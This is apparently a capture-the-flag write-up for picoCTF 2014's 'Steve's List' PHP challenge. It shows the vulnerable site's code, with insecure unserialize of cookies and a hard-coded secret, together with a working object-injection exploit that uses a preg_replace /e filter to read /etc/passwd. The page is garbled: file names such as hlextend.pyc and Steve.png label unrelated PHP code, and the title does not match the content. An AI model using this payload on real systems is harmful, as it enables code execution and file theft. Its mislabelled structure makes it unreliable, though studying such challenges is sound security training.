Lets disassemble writeup

Author: ctfhacker

pico-ctf-2014/hlextend.pyc

@@ -0,0 +1,17 @@
+<?php
+require_once('steves_list_backup/includes/classes.php');
+$filter = [new Filter('/^(.*)/e', 'file_get_contents(\'/etc/passwd\')')];
+
+$text = "file_get_contents";
+$text = htmlspecialchars($text);
+
+$title = "yay_flag";
+$title = htmlspecialchars($title);
+
+$post = new Post($title, $text, $filter);
+
+$post_ser = serialize($post);
+
+$ser = $post_ser;
+echo $ser;
+?>

pico-ctf-2014/phpscript.php

@@ -0,0 +1,22 @@
+<?php
+  if (isset($_COOKIE['custom_settings'])) {
+    // We should verify to make sure this thing is legit.
+    $custom_settings = urldecode($_COOKIE['custom_settings']);
+    $hash = sha1(AUTH_SECRET . $custom_settings);
+    if ($hash !== $_COOKIE['custom_settings_hash']) {
+      die("Why would you hack Section Chief Steve's site? :(");
+    }
+    // we only support one setting for now, but we might as well put this in.
+    $settings_array = explode("\n", $custom_settings);
+    $custom_settings = array();
+    for ($i = 0; $i < count($settings_array); $i++) {
+      $setting = $settings_array[$i];
+      $setting = unserialize($setting);
+      $custom_settings[] = $setting;
+    }
+  } else {
+    $custom_settings = array(0 => true);
+    setcookie('custom_settings', urlencode(serialize(true)), time() + 86400 * 30, "/");
+    setcookie('custom_settings_hash', sha1(AUTH_SECRET . serialize(true)), time() + 86400 * 30, "/");
+  }
+?>

pico-ctf-2014/steves_list_backup/Steve.png

@@ -0,0 +1,51 @@
+<?php
+  class Filter {
+    protected $pattern;
+    protected $repl;
+    function __construct($pattern, $repl) {
+      $this->pattern = $pattern;
+      $this->repl = $repl;
+    }
+    function filter($data) {
+      return preg_replace($this->pattern, $this->repl, $data);
+    }
+  };
+
+  class Post {
+    protected $title;
+    protected $text;
+    protected $filters;
+    function __construct($title, $text, $filters) {
+      $this->title = $title;
+      $this->text = $text;
+      $this->filters = $filters;
+    }
+
+    function get_title() {
+      return htmlspecialchars($this->title);
+    }
+
+    function display_post() {
+      $text = htmlspecialchars($this->text);
+      foreach ($this->filters as $filter)
+        $text = $filter->filter($text);
+      return $text;
+    }
+
+    function __destruct() {
+      // debugging stuff
+      $s = "<!-- POST " . htmlspecialchars($this->title);
+      $text = htmlspecialchars($this->text);
+      foreach ($this->filters as $filter)
+        $text = $filter->filter($text);
+      $s = $s . ": " . $text;
+      $s = $s . " -->";
+      echo $s;
+    }
+  };
+
+  $standard_filter_set = [new Filter("/\[i\](.*)\[\/i\]/i", "<i>\\1</i>"),
+                          new Filter("/\[b\](.*)\[\/b\]/i", "<b>\\1</b>"),
+                          new Filter("/\[img\](.*)\[\/img\]/i", "<img src='\\1'>"),
+                          new Filter("/\[br\]/i", "<br>")];
+?>

pico-ctf-2014/steves_list_backup/cookies.php

@@ -0,0 +1,18 @@
+<?php
+  require_once("root_data.php");
+  include(STEVES_LIST_ABSOLUTE_INCLUDE_ROOT . "cookies.php");
+  require_once(STEVES_LIST_ABSOLUTE_INCLUDE_ROOT . "includes/classes.php");
+  // Okay, this is the front page.
+  // We should just display all the recent posts. We'll figure out how to add posts later.
+  $posts = array_diff(scandir(STEVES_LIST_ABSOLUTE_INCLUDE_ROOT . "posts"), array('..', '.'));
+  $display_posts = array();
+  if ($custom_settings[DISPLAY_POSTS]) {
+    // display posts
+    foreach ($posts as $p) {
+      $contents = file_get_contents(STEVES_LIST_ABSOLUTE_INCLUDE_ROOT . "posts/" . $p);
+      $post = unserialize($contents);
+      $display_posts []= $post;
+    }
+  }
+  require_once(STEVES_LIST_TEMPLATES_PATH . "view_posts.php");
+?>

pico-ctf-2014/steves_list_backup/includes/classes.php

@@ -0,0 +1,8 @@
+<?php
+  define('STEVES_LIST_ABSOLUTE_INCLUDE_ROOT', dirname(__FILE__) . "/");
+  define('STEVES_LIST_TEMPLATES_PATH', dirname(__FILE__) . "/templates/");
+  define('DISPLAY_POSTS', 0);
+  // Daedalus changed this... I guess AAAAAAAA was not a good secret :(
+  define('AUTH_SECRET', "AAAAAAAA");
+  require_once(STEVES_LIST_ABSOLUTE_INCLUDE_ROOT . "includes/classes.php");
+?>

pico-ctf-2014/steves_list_backup/index.php

@@ -0,0 +1,3 @@
+    </div>
+  </body>
+</html>

pico-ctf-2014/steves_list_backup/posts/steve.txt

@@ -0,0 +1,14 @@
+<html>
+  <head>
+    <title><?php echo $title; ?></title>
+    <link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css" />
+    <script src="javascript" src="http://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/js/bootstrap.min.js"></script>
+  </head>
+  <body>
+    <div class="container">
+      <div class="row">
+        <center><h1><?php echo $title; ?></h1></center>
+        <p>
+          <?php echo $blurb; echo "\n"; ?>
+        </p>
+      </div>